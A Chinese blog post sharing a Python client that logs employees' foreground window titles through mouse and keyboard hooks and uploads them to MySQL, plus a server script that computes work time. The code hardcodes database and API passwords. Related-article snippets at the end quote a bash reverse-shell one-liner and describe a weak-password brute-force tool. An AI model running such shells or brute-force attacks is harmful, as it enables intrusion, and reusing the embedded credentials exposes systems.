Python写的监视工具

最近有个需求,统计录入人员的实际工作时间,想了下,每隔一段时间做一个客户端把用户当前的窗口标题记录下来,定期传给MySQL,之后再用另外一个脚本分析实际的工作时间,初学Python,没写过什么东西,如有错误,望指正。

客户端如下:

import win32gui
import time
import getpass
import pythoncom
import pyHook
import threading
import MySQLdb
import sys

LOG_LIST = []  # init global log list
LAST_LOG = None  # time_stamp of last log.

class Mysql():
    def __init__(self):
        try:
            self.conn = MySQLdb.connect(
                host=‘192.168.100.250‘,
                user=‘hook_agent‘, passwd=‘qwqwqw480066‘,
                db=‘qc_upload‘, port=3306,
                charset=‘utf8‘)
        except MySQLdb.Error, e:
            print ‘Connect to MySQL Failed‘, e
            sys.exit(5)
        else:
            self.cursor = self.conn.cursor()

    def __del__(self):
        self.cursor.close()
        self.conn.close()

    def insert(self, sql, params):
        print ‘Insert to DB.‘
        try:
            self.cursor.executemany(sql, params)
        except Exception, e:
            print ‘Failed to write db‘, e
        else:
            self.conn.commit()

def get_window_name():
    """return current focus window name"""
    window_name = win32gui.GetWindowText(win32gui.GetForegroundWindow())
    ‘‘‘for fault tolerance. when cursor in StartMenu,
    window_name may will return None, and NoneType have no decode method,
    cause AttributeError‘‘‘
    try:
        return window_name.decode(‘gbk‘)[:50]
    except AttributeError:
        return ‘None‘

def upload(data):
    """upload to server,
    if failed, retry every 2 minutes, total 10 times."""
    print data
    retry = 0
    while retry <= 10:
        try:
            sql_helper = Mysql()
            sql = ‘insert into qc_worklog(uid, date, time_stmp, win_title)             values(%s, %s, %s, %s)‘
            sql_helper.insert(sql, data)
            break
        except:
            time.sleep(120)
            retry += 1
            continue
        finally:
            del sql_helper

def log(event):
    """every 120 seconds log the win_name,
    and when logs‘ count >= 30, upload."""
    global LOG_LIST, LAST_LOG
    time_now = int(time.time())
    if not LAST_LOG or time_now - LAST_LOG >= 120:
        log_list = [
            getpass.getuser(), time.strftime("%Y-%m-%d"),
            int(time.time()), get_window_name()]
        LOG_LIST.append(log_list)
        if len(LOG_LIST) >= 30:
            upload_t = threading.Thread(target=upload, args=(LOG_LIST,))
            upload_t.start()
            LOG_LIST = []   # re-init the LOG_LIST
        LAST_LOG = time_now
    return True  # MUST return True, or cursor will NOT able to move.

def main():
    hm = pyHook.HookManager()
    hm.MouseAll = log
    hm.HookMouse()
    hm.KeyDown = log
    hm.HookKeyboard()
    pythoncom.PumpMessages()

if __name__ == ‘__main__‘:
    main()

服务器端判断工作时间脚本如下:

#!/bin/env python
import json
import sys
import MySQLdb
import time
import urllib
import urllib2

class Mysql():
    def __init__(self):
        try:
            self.conn = MySQLdb.connect(
                host=‘127.0.0.1‘,
                user=‘root‘, passwd=‘qwqwqw‘,
                db=‘qc_upload‘, port=3306,
                charset=‘utf8‘)
        except MySQLdb.Error, e:
            print ‘Connect to MySQL Failed‘, e
            log(e)
            sys.exit(5)
        else:
            self.cursor = self.conn.cursor()

    def __del__(self):
        self.cursor.close()
        self.conn.close()

    def query(self, sql, params):
        try:
            self.cursor.execute(sql, params)
        except Exception, e:
            print human_time(), ‘Failed to read db‘, e
            log(e)
        else:
            return self.cursor.fetchall()

def human_time():
    return time.strftime("%Y-%m-%d %H:%M:%S")

def log(e):
    content = human_time() + e.__str__() + ‘\n‘
    with open(‘logs.log‘, ‘a‘) as f:
        f.write(content)

def calculate(username, day):
    """analyse today‘s log, if keyword(‘LinkDoc‘) in win_title,
    add the time to work time. and return work_time"""
    # select passed username‘s log
    sql_helper = Mysql()
    sql = ‘select time_stmp, win_title from qc_worklog         where uid=%s and date=%s order by time_stmp‘
    logs = sql_helper.query(sql, (username[0], day))
    # calculate the current user‘s work time
    work_time = 0
    for log in logs:
        if ‘LinkDoc‘ in log[1]:
            if ‘last_time_stmp‘ not in dir():
                last_time_stmp = log[0]
            delta_time = log[0] - last_time_stmp
            if delta_time <= 300:
                work_time += delta_time
        last_time_stmp = log[0]
    return {‘username‘: username[0], ‘qc_time‘: work_time, ‘date‘: day}

def analyse(day=time.strftime("%Y-%m-%d"), action=‘upload‘):
    """analyse user‘s worktime of today"""
    sql_helper = Mysql()
    sql = ‘select distinct uid from qc_worklog where date=%s‘
    # get all distinct username of today
    usernames = sql_helper.query(sql, (day,))
    # call calculate func. and add to the result list.
    result = []
    for u in usernames:
        result.append(calculate(u, day))
    if action == ‘upload‘:
        upload(result)
    elif action == ‘print‘:
        print result

def get_token():
    """get token from dig"""
    url = ‘http://192.168.10.38:8089/login/collectorlogin    ?collecter_name=dig_api_auth&password=wei712372_knil‘
    while True:
        try:
            req = urllib2.Request(url)
            response = urllib2.urlopen(req, timeout=10)
            res_data = json.loads(response.read())
            break
        except urllib2.URLError, e:
            log(e)
            time.sleep(120)
            continue
    return res_data[‘data‘][‘token‘]

def upload(result):
    """upload to dig"""
    post_value = {‘data‘: json.dumps(result), ‘token‘: get_token()}
    post = urllib.urlencode(post_value)
    url = ‘http://192.168.10.38:8089/api/saveUserWorktime‘
    while True:
        try:
            req = urllib2.Request(url)
            response = urllib2.urlopen(req, post, timeout=10)
            res = response.read()
            break
        except urllib2.URLError, e:
            log(e)
            time.sleep(120)
            continue
    log(res)

def print_usage():
    print """usage: -p for print today‘s workload.
    -p YYYY-MM-DD for print specific day‘s workload
    run the script without any args, upload the workload of today
    run the srcipt with YYYY-MM-DD, upload the workload of the specific day"""

def main():
    args = sys.argv
    if len(args) > 1:
        # print the workload of today
        if ‘-p‘ in args and len(args) == 2:
            analyse(action=‘print‘)
        # print the workload of specific day
        elif ‘-p‘ in args and len(args) == 3 and len(args[2]) == 10:
            analyse(day=args[2], action=‘print‘)
        # upload the workload of specific day.
        elif len(args[1]) == 10:
            analyse(day=args[1])
        else:
            print_usage()
    # upload the workload of today
    elif len(args) == 1:
        analyse()
    else:
        print_usage()

if __name__ == ‘__main__‘:
    main()
时间: 2024-08-08 13:52:57

Python写的监视工具的相关文章

以Python写的 反弹工具

我们知道,一般的反弹shell 可以直接使用   base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令   nc  nmap 等等.... nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道我针对了php 的文件加强了管控, 所以它又有针对性的使用了Linux自带的Python  进行基于Python的反弹 源码: # -*- coding:utf-8 -*-#!/usr/bin/env

Python网络质量测试工具增加乱序统计

半月月前,我用Python写了一个工具,可以测试网络的纯丢包率以及探测网络路径中的队列情况,经过一些使用者的反馈,还算比较好用,关于这个工具,请参见<动手写一个探测网络质量(丢包率/RTT/队形等)的工具>.        但是我觉得这个少了关于乱序度的测试功能,于是补充之.其实,在Linux的TC工具上,除了队列,丢包率,延迟之外,乱序度也是一个非常重要的配置参数,不过请记住,Linux不是全部,对于程序员而言,除了抓包之外,了解一点Linux之外的东西,比如Cisco,运营商之类的,还是必

python 写的http后台弱口令爆破工具

# -*- coding: utf-8 -*- # 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任) import urllib2 import urllib import httplib import threading headers = {"Content-Type":&quo

自制 python hadoop streaming 数据分析工具

https://github.com/zhuyi10/hadoop_data_analysis跟大家交流一下我写的数据分析工具用hadoop streaming执行python写的mapper, reducer目前只实现了一些简单的分析功能希望大家多提意见

【总结】学用python写程序

工作多年,因为项目需要,用过的编程语言不少了:c/c++.java.c#.汇编.vb.objective c.apple script.不过主要使用的还是c/c++,一方面是用得久了,习惯了.另一方面,思考问题的方式已经偏"底层"了,不想内存.不考虑指针,似乎就浑身冷汗,无法编程了.连带我在面试一些小朋友的时候也会不自觉的问一些底层的知识点.再有一方面,就是想要程序的运行效率更高一些,个人一直以写高效的(算法)程序为目标,而c/c++是除了汇编之外的,能写出的运行效率最高的编程语言--

python写爬虫使用urllib2方法

python写爬虫使用urllib2方法 整理了一部分urllib2的使用细节. 1.Proxy 的设置 urllib2 默认会使用环境变量 http_proxy 来设置 HTTP Proxy. 如果想在程序中明确控制 Proxy 而不受环境变量的影响,可以使用代理. 新建test14来实现一个简单的代理Demo: import urllib2 enable_proxy = True proxy_handler = urllib2.ProxyHandler({"http" : 'htt

【转载】学用python写程序

学用python写程序 工作多年,因为项目需要,用过的编程语言不少了:c/c++.java.c#.汇编.vb.objective c.apple script.不过主要使用的还是c/c++,一方面是用得久了,习惯了.另一方面,思考问题的方式已经偏“底层”了,不想内存.不考虑指针,似乎就浑身冷汗,无法编程了.连带我在面试一些小朋友的时候也会不自觉的问一些底层的知识点.再有一方面,就是想要程序的运行效率更高一些,个人一直以写高效的(算法)程序为目标,而c/c++是除了汇编之外的,能写出的运行效率最高

[转]Oracle10g数据库自动诊断监视工具(ADDM)使用指南

第一章 ADDM简介                 在Oracle9i及之前,DBA们已经拥有了很多很好用的性能分析工具,比如,tkprof.sql_trace.statspack.set event 10046&10053等等.这些工具能够帮助DBA很快的定位性能问题.但这些工具都只给出一些统计数据,然后再由DBA们根据自己的经验进行 优化.         那能不能由机器自动在统计数据的基础上给出优化建议呢?Oracle10g中就推出了新的优化诊断工具:数据库自动诊断监视工具(Automa

python打包成.exe工具py2exe0-----No such file or directory错误

转自:http://justcoding.iteye.com/blog/900993 一.简介 py2exe是一个将python脚本转换成windows上的可独立执行的可执行程序(*.exe)的工具,这样,你就可以不用装python而在windows系统上运行这个可执行程序. py2exe已经被用于创建wxPython,Tkinter,Pmw,PyGTK,pygame,win32com client和server,和其它的独立程序.py2exe是发布在开源许可证下的. 二.安装py2exe 从h